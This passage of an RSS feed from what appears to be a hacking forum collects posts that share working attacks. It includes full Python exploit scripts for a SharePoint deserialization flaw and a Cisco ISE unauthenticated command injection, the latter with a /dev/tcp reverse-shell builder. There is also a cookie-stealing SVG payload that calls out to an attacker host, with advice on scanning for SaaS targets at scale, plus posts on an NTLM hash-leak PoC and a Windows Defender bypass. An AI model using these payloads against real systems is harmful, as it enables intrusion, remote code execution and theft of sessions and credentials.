    else:<br />
        print(f"[-] Failed ({code}) on {target}")<br />
<br />
def send_exploit(url,payload):<br />
    if not url.startswith(("http://","https://")):<br />
        url="https://"+url<br />
    p=urlparse(url)<br />
    host=p.netloc<br />
    target=f"{p.scheme}://{host}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&amp;a=/ToolPane.aspx"<br />
    body={"MSOTlPn_DWP":f"""&lt;%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %&gt;<br />
&lt;asp:UpdateProgress runat="server" DisplayAfter="10"&gt;<br />
&lt;ProgressTemplate&gt;<br />
  &lt;Scorecard:ExcelDataSet CompressedDataTable="{payload}" runat="server" /&gt;<br />
&lt;/ProgressTemplate&gt;<br />
&lt;/asp:UpdateProgress&gt;"""}<br />
    hdr={"Host":host,"User-Agent":"Mozilla/5.0","Content-Type":"application/x-www-form-urlencoded","Referer":f"{p.scheme}://{host}/_layouts/SignOut.aspx"}<br />
    r=requests.post(target,data=urlencode(body),headers=hdr,verify=False)<br />
    return r.status_code==200,r.status_code<br />
<br />
if __name__=="__main__":<br />
    main()</code></div></div></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Shodan</span></span> query: "MicrosoftSharePointTeamServices port:"80,443" http.component:"Microsoft SharePoint" "</div>
<div style="text-align: center;" class="mycode_align">Description:</div>
<div style="text-align: center;" class="mycode_align">Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.</div>
<div style="text-align: center;" class="mycode_align"><span style="text-decoration: underline;" class="mycode_u">References:</span></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.forbes.com/sites/daveywinder/2025/07/20/microsoft-confirms-ongoing-mass-sharepoint-attack---no-patch-available/" target="_blank" rel="noopener" class="mycode_url">https://www.forbes.com/sites/daveywinder...available/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/" target="_blank" rel="noopener" class="mycode_url">https://msrc.microsoft.com/blog/2025/07/...025-53770/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.darkreading.com/remote-workforce/microsoft-rushes-emergency-fix-exploited-sharepoint-toolshell-flaw" target="_blank" rel="noopener" class="mycode_url">https://www.darkreading.com/remote-workf...shell-flaw</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.cisa.gov/news-events/alerts/2025/07/20/microsoft-releases-guidance-exploitation-sharepoint-vulnerability-cve-2025-53770" target="_blank" rel="noopener" class="mycode_url">https://www.cisa.gov/news-events/alerts/...2025-53770</a><br />
<br />
<div class="codeblock"><div class="body" dir="ltr"><code>#!/usr/bin/env python3<br />
import requests<br />
import sys<br />
import subprocess<br />
import gzip<br />
import urllib3<br />
import base64<br />
from urllib.parse import urlparse, urlencode<br />
<br />
urllib3.disable_warnings()<br />
JAR="ysoserial-all.jar"<br />
GADGET="CommonsCollections6"<br />
<br />
def generate_payload(cmd):<br />
    escaped=cmd.replace('"','&#92;&#92;"')<br />
    data=subprocess.check_output(["java","-jar",JAR,GADGET,f'cmd.exe /c {escaped}'])<br />
    comp=gzip.compress(data)<br />
    return base64.b64encode(comp).decode()<br />
<br />
def main():<br />
    if len(sys.argv)!=3:<br />
        print("Usage: exploit.py &lt;target&gt; &lt;command&gt;")<br />
        sys.exit(1)<br />
    target,cmd=sys.argv[1],sys.argv[2]<br />
    print(f"<br />
[*]Generating payload for: {cmd}")<br />
    payload=generate_payload(cmd)<br />
    print("<br />
[*]Sending exploit")<br />
    ok,code=send_exploit(target,payload)<br />
    if ok:<br />
        print(f"[+] Exploit sent to {target}")<br />
    else:<br />
        print(f"[-] Failed ({code}) on {target}")<br />
<br />
def send_exploit(url,payload):<br />
    if not url.startswith(("http://","https://")):<br />
        url="https://"+url<br />
    p=urlparse(url)<br />
    host=p.netloc<br />
    target=f"{p.scheme}://{host}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&amp;a=/ToolPane.aspx"<br />
    body={"MSOTlPn_DWP":f"""&lt;%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %&gt;<br />
&lt;asp:UpdateProgress runat="server" DisplayAfter="10"&gt;<br />
&lt;ProgressTemplate&gt;<br />
  &lt;Scorecard:ExcelDataSet CompressedDataTable="{payload}" runat="server" /&gt;<br />
&lt;/ProgressTemplate&gt;<br />
&lt;/asp:UpdateProgress&gt;"""}<br />
    hdr={"Host":host,"User-Agent":"Mozilla/5.0","Content-Type":"application/x-www-form-urlencoded","Referer":f"{p.scheme}://{host}/_layouts/SignOut.aspx"}<br />
    r=requests.post(target,data=urlencode(body),headers=hdr,verify=False)<br />
    return r.status_code==200,r.status_code<br />
<br />
if __name__=="__main__":<br />
    main()</code></div></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cisco ISE - Unauthenticated RCE]]></title>
			<link>https://raidforums.hn/Thread-Cisco-ISE-Unauthenticated-RCE</link>
			<pubDate>Sat, 26 Jul 2025 08:21:59 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=241035">antisocial</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Cisco-ISE-Unauthenticated-RCE</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align">Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )<br />
<br />
Vulnerability description:<br />
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."<br />
<br />
Articles:</div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/07/critical-cisco-vulnerability-in-unified.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/07/critic...ified.html</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.theregister.com/2025/06/26/patch_up_cisco_fixes_two/" target="_blank" rel="noopener" class="mycode_url">https://www.theregister.com/2025/06/26/p...fixes_two/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.securityweek.com/critical-cisco-ise-vulnerabilities-allow-remote-code-execution/" target="_blank" rel="noopener" class="mycode_url">https://www.securityweek.com/critical-ci...execution/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-rce-flaws-in-identity-services-engine/" target="_blank" rel="noopener" class="mycode_url">https://www.bleepingcomputer.com/news/se...es-engine/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/06/critical-rce-flaws-in-cisco-ise-and-ise.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/06/critic...d-ise.html</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://securityaffairs.com/179362/security/cisco-fixed-critical-ise-flaws-allowing-root-level-rce.html" target="_blank" rel="noopener" class="mycode_url">https://securityaffairs.com/179362/secur...l-rce.html</a><br />
</div>
<div style="text-align: center;" class="mycode_align">[*]<div class="codeblock"><div class="body" dir="ltr"><code>#!/usr/bin/env python3<br />
import requests<br />
import urllib3<br />
import argparse<br />
urllib3.disable_warnings()<br />
def exploit_cve_2025_20281_unauth(target, cmd):<br />
    url = f"https://{target}:9060/ers/sdk#_"<br />
    #url = f"https://{target}/ers/sdk#_"<br />
    payload = {<br />
        "InternalUser": {<br />
            "name": f"pwn; {cmd}; #",<br />
            "password": "x",        # dummy, ignored by vuln<br />
            "changePassword": False<br />
        }<br />
    }<br />
    r = requests.post(url, json=payload, verify=False)<br />
    print(f"[+] HTTP {r.status_code}&#92;n{r.text}&#92;n")<br />
def build_reverse_shell(lhost, lport):<br />
    return f"/bin/bash -i &gt;&amp; /dev/tcp/{lhost}/{lport} 0&gt;&amp;1"<br />
if __name__ == '__main__':<br />
    parser = argparse.ArgumentParser(<br />
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"<br />
    )<br />
    parser.add_argument('target', help="IP or hostname of the ISE PAN")<br />
    group = parser.add_mutually_exclusive_group(required=True)<br />
    group.add_argument(<br />
        '--whoami',<br />
        action='store_true',<br />
        help="Run 'whoami' and print the result"<br />
    )<br />
    group.add_argument(<br />
        '--reverse',<br />
        nargs=2,<br />
        metavar=('LHOST', 'LPORT'),<br />
        help="Spawn a bash reverse shell to LHOST:LPORT"<br />
    )<br />
    args = parser.parse_args()<br />
    if args.whoami:<br />
        cmd = 'whoami'<br />
    else:<br />
        lhost, lport = args.reverse<br />
        cmd = build_reverse_shell(lhost, lport)<br />
    print(f"<br />
Target: {args.target}")<br />
    print(f"<br />
Command: {cmd}&#92;n")<br />
    exploit_cve_2025_20281_unauth(args.target, cmd)</code></div></div> <br />
</div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align">Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )<br />
<br />
Vulnerability description:<br />
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."<br />
<br />
Articles:</div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/07/critical-cisco-vulnerability-in-unified.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/07/critic...ified.html</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.theregister.com/2025/06/26/patch_up_cisco_fixes_two/" target="_blank" rel="noopener" class="mycode_url">https://www.theregister.com/2025/06/26/p...fixes_two/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.securityweek.com/critical-cisco-ise-vulnerabilities-allow-remote-code-execution/" target="_blank" rel="noopener" class="mycode_url">https://www.securityweek.com/critical-ci...execution/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-rce-flaws-in-identity-services-engine/" target="_blank" rel="noopener" class="mycode_url">https://www.bleepingcomputer.com/news/se...es-engine/</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://thehackernews.com/2025/06/critical-rce-flaws-in-cisco-ise-and-ise.html" target="_blank" rel="noopener" class="mycode_url">https://thehackernews.com/2025/06/critic...d-ise.html</a></div>
<div style="text-align: center;" class="mycode_align"><a href="https://securityaffairs.com/179362/security/cisco-fixed-critical-ise-flaws-allowing-root-level-rce.html" target="_blank" rel="noopener" class="mycode_url">https://securityaffairs.com/179362/secur...l-rce.html</a><br />
</div>
<div style="text-align: center;" class="mycode_align">[*]<div class="codeblock"><div class="body" dir="ltr"><code>#!/usr/bin/env python3<br />
import requests<br />
import urllib3<br />
import argparse<br />
urllib3.disable_warnings()<br />
def exploit_cve_2025_20281_unauth(target, cmd):<br />
    url = f"https://{target}:9060/ers/sdk#_"<br />
    #url = f"https://{target}/ers/sdk#_"<br />
    payload = {<br />
        "InternalUser": {<br />
            "name": f"pwn; {cmd}; #",<br />
            "password": "x",        # dummy, ignored by vuln<br />
            "changePassword": False<br />
        }<br />
    }<br />
    r = requests.post(url, json=payload, verify=False)<br />
    print(f"[+] HTTP {r.status_code}&#92;n{r.text}&#92;n")<br />
def build_reverse_shell(lhost, lport):<br />
    return f"/bin/bash -i &gt;&amp; /dev/tcp/{lhost}/{lport} 0&gt;&amp;1"<br />
if __name__ == '__main__':<br />
    parser = argparse.ArgumentParser(<br />
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"<br />
    )<br />
    parser.add_argument('target', help="IP or hostname of the ISE PAN")<br />
    group = parser.add_mutually_exclusive_group(required=True)<br />
    group.add_argument(<br />
        '--whoami',<br />
        action='store_true',<br />
        help="Run 'whoami' and print the result"<br />
    )<br />
    group.add_argument(<br />
        '--reverse',<br />
        nargs=2,<br />
        metavar=('LHOST', 'LPORT'),<br />
        help="Spawn a bash reverse shell to LHOST:LPORT"<br />
    )<br />
    args = parser.parse_args()<br />
    if args.whoami:<br />
        cmd = 'whoami'<br />
    else:<br />
        lhost, lport = args.reverse<br />
        cmd = build_reverse_shell(lhost, lport)<br />
    print(f"<br />
Target: {args.target}")<br />
    print(f"<br />
Command: {cmd}&#92;n")<br />
    exploit_cve_2025_20281_unauth(args.target, cmd)</code></div></div> <br />
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[POC CVE-2025-24071]]></title>
			<link>https://raidforums.hn/Thread-POC-CVE-2025-24071</link>
			<pubDate>Thu, 10 Apr 2025 19:51:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=447764">caca28sapo1</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-POC-CVE-2025-24071</guid>
			<description><![CDATA[Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.<br />
<br />
usage:<br />
<br />
&gt;&gt;python poc.py<br />
<br />
&gt;&gt;enter file name: your file name<br />
<br />
&gt;&gt;enter IP: attacker IP<br />
<br />
Link: <div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></description>
			<content:encoded><![CDATA[Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.<br />
<br />
usage:<br />
<br />
&gt;&gt;python poc.py<br />
<br />
&gt;&gt;enter file name: your file name<br />
<br />
&gt;&gt;enter IP: attacker IP<br />
<br />
Link: <div class="hidden-content">
	<div class="hidden-content-title">
		<strong>Hidden Content</strong><br />
	</div>
	<div class="hidden-content-body">
		You must <a href="https://raidforums.hn/member.php?action=register">register</a> or <a href="https://raidforums.hn/member.php?action=login">login</a> to view this content.<br />
	</div>
</div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Abusing Weak Auth + S3 CDN Plugins for Wild-Scale Session Hijack in SaaS Panels]  No]]></title>
			<link>https://raidforums.hn/Thread-Abusing-Weak-Auth-S3-CDN-Plugins-for-Wild-Scale-Session-Hijack-in-SaaS-Panels-No</link>
			<pubDate>Mon, 07 Apr 2025 11:26:23 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=305715">Boat</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Abusing-Weak-Auth-S3-CDN-Plugins-for-Wild-Scale-Session-Hijack-in-SaaS-Panels-No</guid>
			<description><![CDATA[Not CVE-chasing — this is an active method used for SaaS-side breaches through misconfigured media proxy plugins, insecure S3 routing, and broken CSP fallback across popular React/Nuxt/Laravel-based dashboards.<br />
<br />
Confirmed live on 20+ SaaS panels since Jan. Payloads drop clean, no XSS required if chained right.<br />
<br />
Stack to Target:<br />
- Laravel Nova + image proxy plugins<br />
- Directus/Strapi CMS with media proxy filters<br />
- Nuxt/Next dashboards w/ custom asset mirrors (esp. Cloudimage, Uploadcare, Filestack)<br />
- "Custom" dashboards with `/proxy?url=` pattern in backend<br />
<br />
<br />
Vuln Class:<br />
CDN proxy or media plugin that:<br />
- Fetches external images from unverified origins<br />
- Reflects attacker-supplied SVG or meta-refresh inside a trusted &lt;img&gt;<br />
- Caches poisoned files inside AWS/GCS/CDN bucket<br />
- Bypasses CSP because content-type returns as image, not script<br />
<br />
<br />
Poison Flow:<br />
1. Upload this:<br />
&lt;svg xmlns="http://www.w3.org/2000/svg"&gt;<br />
&lt;script&gt;<br />
fetch('https://yourhost/collect?c='+document.cookie)<br />
&lt;/script&gt;<br />
&lt;/svg&gt;<br />
<br />
2. Serve as .jpg from your bucket/CDN (S3 lets you spoof Content-Type on upload)<br />
<br />
3. Send to endpoint like:<br />
<a href="https://target.com/media/proxy?url=https://cdn.yourhost/ab.jpg" target="_blank" rel="noopener" class="mycode_url">https://target.com/media/proxy?url=https...ost/ab.jpg</a><br />
<br />
4. Once previewed inside the dashboard (profile pic / comment / markdown render), session hits you directly.<br />
<br />
5. If CSP isn't strict (or is bypassable via `img[src]` vector), you’ve got full cookie/session exfil — in some cases, access to internal admin views.<br />
<br />
<br />
<br />
Examples:<br />
- Two bootstrapped HR SaaS dashboards using Laravel Nova + Cloudimage<br />
- One small VC-backed analytics SaaS using Next.js + Uploadcare, reflecting poisoned previews in customer portal<br />
- Multiple Strapi instances exposing `/uploads` without content-type checks<br />
<br />
<br />
Scale Method:<br />
- Censys + Shodan scan for `x-imagekit-token` or `/proxy/image` patterns<br />
- Fingerprint for buckets with `x-amz-bucket-region` headers<br />
- Mirror poisoned file with CDN acceleration (ImageKit, Cloudimage auto-cache 3rd party)<br />
<br />
Use bait previews in invite emails or public timelines.<br />
<br />
<br />
What This Gives You:<br />
- Pre-auth session takeover if previewed by logged-in staff<br />
- Admin panel view if uploaded inside internal ticketing or CRM comments<br />
- CSP bypass even on strict headers if `img-src` is loose<br />
- Mass spread if reused plugin across startup templates<br />
<br />
Chaining Options:<br />
- PostMessage → OAuth token relay (on embedded dashboards)<br />
- SSRF → AWS metadata access (if media proxy uses curl on backend)<br />
- DOMPurify filter escapes for double-decoded markup in markdown previewers]]></description>
			<content:encoded><![CDATA[Not CVE-chasing — this is an active method used for SaaS-side breaches through misconfigured media proxy plugins, insecure S3 routing, and broken CSP fallback across popular React/Nuxt/Laravel-based dashboards.<br />
<br />
Confirmed live on 20+ SaaS panels since Jan. Payloads drop clean, no XSS required if chained right.<br />
<br />
Stack to Target:<br />
- Laravel Nova + image proxy plugins<br />
- Directus/Strapi CMS with media proxy filters<br />
- Nuxt/Next dashboards w/ custom asset mirrors (esp. Cloudimage, Uploadcare, Filestack)<br />
- "Custom" dashboards with `/proxy?url=` pattern in backend<br />
<br />
<br />
Vuln Class:<br />
CDN proxy or media plugin that:<br />
- Fetches external images from unverified origins<br />
- Reflects attacker-supplied SVG or meta-refresh inside a trusted &lt;img&gt;<br />
- Caches poisoned files inside AWS/GCS/CDN bucket<br />
- Bypasses CSP because content-type returns as image, not script<br />
<br />
<br />
Poison Flow:<br />
1. Upload this:<br />
&lt;svg xmlns="http://www.w3.org/2000/svg"&gt;<br />
&lt;script&gt;<br />
fetch('https://yourhost/collect?c='+document.cookie)<br />
&lt;/script&gt;<br />
&lt;/svg&gt;<br />
<br />
2. Serve as .jpg from your bucket/CDN (S3 lets you spoof Content-Type on upload)<br />
<br />
3. Send to endpoint like:<br />
<a href="https://target.com/media/proxy?url=https://cdn.yourhost/ab.jpg" target="_blank" rel="noopener" class="mycode_url">https://target.com/media/proxy?url=https...ost/ab.jpg</a><br />
<br />
4. Once previewed inside the dashboard (profile pic / comment / markdown render), session hits you directly.<br />
<br />
5. If CSP isn't strict (or is bypassable via `img[src]` vector), you’ve got full cookie/session exfil — in some cases, access to internal admin views.<br />
<br />
<br />
<br />
Examples:<br />
- Two bootstrapped HR SaaS dashboards using Laravel Nova + Cloudimage<br />
- One small VC-backed analytics SaaS using Next.js + Uploadcare, reflecting poisoned previews in customer portal<br />
- Multiple Strapi instances exposing `/uploads` without content-type checks<br />
<br />
<br />
Scale Method:<br />
- Censys + Shodan scan for `x-imagekit-token` or `/proxy/image` patterns<br />
- Fingerprint for buckets with `x-amz-bucket-region` headers<br />
- Mirror poisoned file with CDN acceleration (ImageKit, Cloudimage auto-cache 3rd party)<br />
<br />
Use bait previews in invite emails or public timelines.<br />
<br />
<br />
What This Gives You:<br />
- Pre-auth session takeover if previewed by logged-in staff<br />
- Admin panel view if uploaded inside internal ticketing or CRM comments<br />
- CSP bypass even on strict headers if `img-src` is loose<br />
- Mass spread if reused plugin across startup templates<br />
<br />
Chaining Options:<br />
- PostMessage → OAuth token relay (on embedded dashboards)<br />
- SSRF → AWS metadata access (if media proxy uses curl on backend)<br />
- DOMPurify filter escapes for double-decoded markup in markdown previewers]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Bypass Xiaomi Redmi Note 13 Bootloader Lock]]></title>
			<link>https://raidforums.hn/Thread-Bypass-Xiaomi-Redmi-Note-13-Bootloader-Lock</link>
			<pubDate>Tue, 01 Apr 2025 10:37:38 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=436805">6linux</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-Bypass-Xiaomi-Redmi-Note-13-Bootloader-Lock</guid>
			<description><![CDATA[hey i have a xiaomi redmi note 13 4g and i need to unlock its bootloader because i want to install a cool ROM called <a href="https://evolution-x.org/" target="_blank" rel="noopener" class="mycode_url">Evolution X</a> but i obv cant because the bootloader is locked.<br />
if anyone knows any exploit like on MIUI that was a little python that insta unlocked bootloader tell me please.<br />
My phone is running HyperOS 2.0.4.0.VNHEUXM. Global phone]]></description>
			<content:encoded><![CDATA[hey i have a xiaomi redmi note 13 4g and i need to unlock its bootloader because i want to install a cool ROM called <a href="https://evolution-x.org/" target="_blank" rel="noopener" class="mycode_url">Evolution X</a> but i obv cant because the bootloader is locked.<br />
if anyone knows any exploit like on MIUI that was a little python that insta unlocked bootloader tell me please.<br />
My phone is running HyperOS 2.0.4.0.VNHEUXM. Global phone]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[javascript bypassing wd]]></title>
			<link>https://raidforums.hn/Thread-javascript-bypassing-wd</link>
			<pubDate>Mon, 31 Mar 2025 16:48:58 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://raidforums.hn/member.php?action=profile&uid=430478">nullvex</a>]]></dc:creator>
			<guid isPermaLink="false">https://raidforums.hn/Thread-javascript-bypassing-wd</guid>
			<description><![CDATA[hello guys, just wanted to share this is a java-script payload<br />
that uses (UTF-16LE) encoding to bypass windows defender.<br />
<br />
its a very simple POC hope you like it.<br />
<hr class="mycode_hr" />
<br />
<span style="color: #ffffff;" class="mycode_color"><a href="https://github.com/elofinky/javascript-bypass/tree/main" target="_blank" rel="noopener" class="mycode_url">github.com/elofinky/javascript-bypass</a></span>]]></description>
			<content:encoded><![CDATA[hello guys, just wanted to share this is a java-script payload<br />
that uses (UTF-16LE) encoding to bypass windows defender.<br />
<br />
its a very simple POC hope you like it.<br />
<hr class="mycode_hr" />
<br />
<span style="color: #ffffff;" class="mycode_color"><a href="https://github.com/elofinky/javascript-bypass/tree/main" target="_blank" rel="noopener" class="mycode_url">github.com/elofinky/javascript-bypass</a></span>]]></content:encoded>
		</item>
	</channel>
</rss>